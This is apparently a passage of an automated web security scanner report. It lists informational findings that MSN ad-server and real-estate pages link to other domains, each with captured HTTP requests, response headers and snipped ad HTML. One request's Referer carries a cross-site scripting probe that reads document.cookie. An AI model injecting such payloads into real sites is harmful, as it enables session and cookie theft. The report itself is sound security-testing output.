http://clk.redcated/MEX/go/289781498/direct;/01/
http://redcated/MEX/iview/289781498/direct;/01?click=
http://redcated/MEX/view/289781498/direct;/01/

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=NBCNV1&AP=1390&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2577
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC09=FB=AgEAYQ7hzAgC; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
X-RADID: P8322236-T38343719-C95000000000042282
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 15:14:04 GMT
Content-Length: 2577

//<![CDATA[
function getRADIds() { return{"adid":"95000000000042282","pid":"8322236","targetid":"38343719"};} document.write('<scr'+'ipt type="text/javascript" src="'+encodeURI('http://b.scorecardre
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1476414172() {var adCode_1476414172=new Array();adCode_1476414172.push('<iframe src="http://view.atdmt.com/MEX/iview/289781498/direct;/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">\n');adCode_1476414172.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_1476414172.push('document.write(\'<a href="http://clk.atdmt.com/MEX/go/289781498/direct;/01/" target="_blank"><img src="http://view.atdmt.com/MEX/view/289781498/direct;/01/"/></a>
...[SNIP]...

22.279. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INVXTA&AP=1440

The response contains the following link to another domain:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INVXTA&AP=1440 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1298
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8282372-T30580561-C1686997
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:20 GMT
Content-Length: 1298

//<![CDATA[
var contents_182 = '<span><a target="_blank" href="http://g.redacted/0AD00001/1686997.1?!&&PID=8282372&UIT=G&TargetID=30580561&AN=1628572308&PG=INVXTA">$7 Online
...[SNIP]...
</span><img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308" height="1" width="1" style="display:none;" />';
var fh_182 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

22.280. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVXTA&AP=1440

The response contains the following link to another domain:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/36374631

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVXTA&AP=1440 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1294
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8282372-T30580561-C1686997
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:56:45 GMT
Content-Length: 1294

//<![CDATA[
var contents_182 = '<span><a target="_blank" href="http://g.redacted/0AD00001/1686997.1?!&&PID=8282372&UIT=G&TargetID=30580561&AN=36374631&PG=INVXTA">$7 Online St
...[SNIP]...
</span><img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/36374631" height="1" width="1" style="display:none;" />';
var fh_182 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

22.281. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVPC1&AP=1455

The response contains the following link to another domain:

http://ads2.msads.net/CIS/15/000/000/000/011/774.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVPC1&AP=1455 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 753
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8050733-T28253484-C86000000000035080
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:56:45 GMT
Content-Length: 753

//<![CDATA[
function getRADIds() { return{"adid":"86000000000035080","pid":"8050733","targetid":"28253484"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);}
t
...[SNIP]...
<a href="http://g.redacted/2AD0003K/86000000000035080.1??PID=8050733&UIT=G&TargetID=28253484&AN=17826006&PG=INVPC1&ASID=b016826118104afe9d978aff16ac4855" target="_blank"><img src="http://ads2.msads.net/CIS/15/000/000/000/011/774.gif" width="300" height="60" alt="click here" border="0" /></a>
...[SNIP]...

22.282. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSB&AP=1089&ONECLICK=1

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N4441.microsoftonline/B5073082;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003K/86000000000035072.1?!&&PID=8000152&UIT=G&TargetID=26475342&AN=2016493885&PG=NBCMSB&ASID=512095d5931b4fa2ae9bebe971835c5e&destination=;ord=2016493885?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSB&AP=1089&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2773
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8000152-T26475342-C86000000000035072
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:55:11 GMT
Content-Length: 2773

//<![CDATA[
function getRADIds() { return{"adid":"86000000000035072","pid":"8000152","targetid":"26475342"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_2016493885() {var adCode_2016493885=new Array();adCode_2016493885.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N4441.microsoftonline/B5073082;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003K/86000000000035072.1?!&&PID=8000152&UIT=G&TargetID=26475342&AN=2016493885&PG=NBCMSB&ASID=512095d5931b4fa2ae9bebe971835c5e&destination=;ord=2016493885?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_2016493885.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4441.microsoftonline/B5073082;abr=!ie;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.ms
...[SNIP]...

22.283. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSN&AP=1089&ONECLICK=1

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=993675565&PG=NBCMSN&ASID=bc6615db9ae7439c9d4b6bb2172c275a&destination=;ord=993675565?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSN&AP=1089&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2792
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8058174-T36872389-C52000000000037696
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:49:46 GMT
Content-Length: 2792

//<![CDATA[
function getRADIds() { return{"adid":"52000000000037696","pid":"8058174","targetid":"36872389"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_993675565() {var adCode_993675565=new Array();adCode_993675565.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=993675565&PG=NBCMSN&ASID=bc6615db9ae7439c9d4b6bb2172c275a&destination=;ord=993675565?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_993675565.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;abr=!ie;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=ht
...[SNIP]...

22.284. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSN&AP=1089&ONECLICK=1

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSN&AP=1089&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2809
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8058174-T36872389-C52000000000037696
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:19:42 GMT
Content-Length: 2809

//<![CDATA[
function getRADIds() { return{"adid":"52000000000037696","pid":"8058174","targetid":"36872389"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1895959499() {var adCode_1895959499=new Array();adCode_1895959499.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1895959499.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;abr=!ie;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=h
...[SNIP]...

22.285. http://realestate.redacted/OmRedir.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/OmRedir.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://realestate.redacted/OmRedir.aspx?urlTok=10&cat=NewHomes&GT1=35006

The response contains the following link to another domain:

http://msnportalrealest.112.2o7.net/b/ss/msnportalrealest/1/H.1--NS/0

Request

GET /OmRedir.aspx?urlTok=10&cat=NewHomes&GT1=35006 HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=367a75bcd14c4cb196afb625f0e472fc; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=999BDD41CFB14F40B6F8D0B1BA108F4E; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:43 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 7348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://
...[SNIP]...
<div><img src="http://msnportalrealest.112.2O7.net/b/ss/msnportalrealest/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.286. http://realestate.redacted/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://realestate.redacted/article.aspx?cp-documentid=26575425&GT1=35006

The response contains the following links to other domains:

http://businessweek.com/
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://images.businessweek.com/slideshows/20101027/twenty-best-places-to-start-over-2010/?campaign_id=msn
http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm
http://images.businessweek.com/ss/10/09/0930_discount_condos/index.htm?campaign_id=msn
http://images.businessweek.com/ss/10/10/1007_highest_incomes/index.htm?campaign_id=msn
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalrealest.112.2o7.net/b/ss/msnportalrealest/1/H.1--NS/0
http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js
http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.bing.com/?form=SYNDRE
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=MSREAL
http://www.bing.com/search?q=2011+housing+market+flat&form=SYNDRE
http://www.bing.com/search?q=Foreclosure+activity+up+us+metro+areas&form=SYNDRE
http://www.bing.com/search?q=Groveland%2C+Fla.&form+MSREAL
http://www.bing.com/search?q=Home-loan+program+oversight&form=SYNDRE
http://www.bing.com/search?q=buy+new+or+existing+home&form=MSREAL
http://www.bing.com/search?q=fannie+freddie+backlog&form=SYNDRE
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/msnrealestate
http://www.myhomeredacted/
http://www.twitter.com/msnrealestate
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345039&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Frealestate.redacted%2Farticle.aspx%3Fcp-documentid%3D26575425%26GT1%3D35006&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /article.aspx?cp-documentid=26575425&GT1=35006 HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1bfe95ff9571433495df9b083be3b776; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=420410607C354E3D979F73C5FC7C1273; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:39 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 61517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MSREAL">Bing</a>
...[SNIP]...
